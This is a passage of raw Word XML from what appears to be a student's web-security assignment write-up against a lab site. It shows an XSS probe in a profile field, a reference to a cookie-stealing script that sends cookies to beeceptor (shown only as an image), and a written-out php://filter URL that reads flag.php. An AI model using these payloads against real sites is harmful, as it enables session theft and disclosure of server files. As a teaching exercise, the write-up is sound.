          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FA55CB1" wp14:editId="7CB1C0F4">
                <wp:extent cx="303530" cy="303530"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="30" name="Rectangle 30" descr="flag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677C5" id="Rectangle 30" o:spid="_x0000_s1026" alt="flag4"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p>
    <w:p w14:paraId="59D7AE2A" w14:textId="5FBE0659" w:rsidR="00851350" w:rsidRDefault="00851350" w:rsidP="00851350">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>FLAG{!!!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>ɘmoƨɘwɒ_ƨi_ϱniɿɘɘniϱnɘ_ɘƨɿɘvɘɿ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ED8BE3" w14:textId="4A0690BF" w:rsidR="00851350" w:rsidRDefault="00851350" w:rsidP="00851350">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that the request must be authenticated, otherwise it will just </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> the login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EBD549" w14:textId="77777777" w:rsidR="00851350" w:rsidRPr="00851350" w:rsidRDefault="00851350" w:rsidP="00851350">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0830BA" w14:textId="4247C9C1" w:rsidR="002932C0" w:rsidRPr="002932C0" w:rsidRDefault="002932C0" w:rsidP="002932C0">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002932C0">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Section I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="002932C0">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>XSS in User Profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25146145" w14:textId="115CFBB5" w:rsidR="00084D97" w:rsidRDefault="006206FA" w:rsidP="00084D97">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">There are some blocks allowing user inputs in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>User Profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> page, which may lead to XSS. Input </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>&lt;script&gt; alert(1) &lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> in these blocks to find a place for XSS.</w:t>
      </w:r>
      <w:r w:rsidR="005525C1">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>About Me</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> section is </w:t>
      </w:r>
      <w:r w:rsidR="005525C1">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">finally </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">found to be </w:t>
      </w:r>
      <w:r w:rsidR="00C20A45">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FB9CDC" w14:textId="73A19B7F" w:rsidR="005525C1" w:rsidRPr="005525C1" w:rsidRDefault="005525C1" w:rsidP="005525C1">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005525C1">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19D74848" wp14:editId="07D190B6">
            <wp:extent cx="1548143" cy="642243"/>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1582297" cy="656412"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47682025" w14:textId="683E0B48" w:rsidR="006206FA" w:rsidRDefault="006206FA" w:rsidP="006206FA">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Next, try to steal cookie using the following script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F43BF2B" w14:textId="238E4659" w:rsidR="00C20A45" w:rsidRDefault="00C20A45" w:rsidP="00C20A45">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20A45">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="242D9B7A" wp14:editId="0366F6D8">
            <wp:extent cx="5260063" cy="956587"/>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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5283935" cy="960928"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A877F73" w14:textId="77777777" w:rsidR="006206FA" w:rsidRDefault="006206FA" w:rsidP="006206FA">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">The cookie is sent to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>beeceptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B314A27" w14:textId="28EFC761" w:rsidR="006206FA" w:rsidRDefault="006206FA" w:rsidP="006206FA">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006206FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F1C7173" wp14:editId="7E4E9A88">
            <wp:extent cx="4266791" cy="977265"/>
            <wp:effectExtent l="0" t="0" r="63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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4480760" cy="1026272"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C09C8C" w14:textId="1774CEAC" w:rsidR="00C20A45" w:rsidRDefault="00C20A45" w:rsidP="006206FA">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20A45">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A724E96" wp14:editId="0C3CE6F4">
            <wp:extent cx="5232903" cy="1889386"/>
            <wp:effectExtent l="0" t="0" r="635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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5248861" cy="1895148"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77296084" w14:textId="34B32E30" w:rsidR="00C20A45" w:rsidRDefault="00C20A45" w:rsidP="006206FA">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that the domain of referrer is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>http://localhost/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF6846B" w14:textId="77777777" w:rsidR="006206FA" w:rsidRDefault="006206FA" w:rsidP="006206FA">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Since there is no flag contained, we need to seek other ways. Remember that in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>style.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">, "flag" is in the blacklist. Visit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>http://assignment-dusty-rose.unimelb.life/style.php?css_file=php://filter/convert.base64-encode/resource=flag.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> gives the following response, which indicates </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>flag.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> may exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4842FD4C" w14:textId="20187D95" w:rsidR="006206FA" w:rsidRDefault="006206FA" w:rsidP="006206FA">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006206FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DD9D3B6" wp14:editId="06126FDF">
            <wp:extent cx="4947719" cy="1471877"/>
            <wp:effectExtent l="0" t="0" r="571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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5064880" cy="1506731"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFC3356" w14:textId="1C7454C0" w:rsidR="006206FA" w:rsidRDefault="006206FA" w:rsidP="006206FA">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Try to retrieve </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>flag.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> using AJAX call as the following script shows.</w:t>
      </w:r>
      <w:r w:rsidR="00C20A45">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00084D97">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">It sends the request pretending to be the user. However, currently it is not known if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00084D97">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>flag.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00084D97">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> is stored in remote or local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BB119F" w14:textId="5F38C207" w:rsidR="00084D97" w:rsidRDefault="00084D97" w:rsidP="00084D97">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00084D97">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F7870DE" wp14:editId="244ECE97">
            <wp:extent cx="5051834" cy="1995219"/>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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5072188" cy="2003258"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="764DC95C" w14:textId="41C96C5E" w:rsidR="006206FA" w:rsidRDefault="005E5D7E" w:rsidP="006206FA">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="006206FA">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>eeceptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006206FA">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> gives </w:t>
      </w:r>
      <w:r w:rsidR="006206FA">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
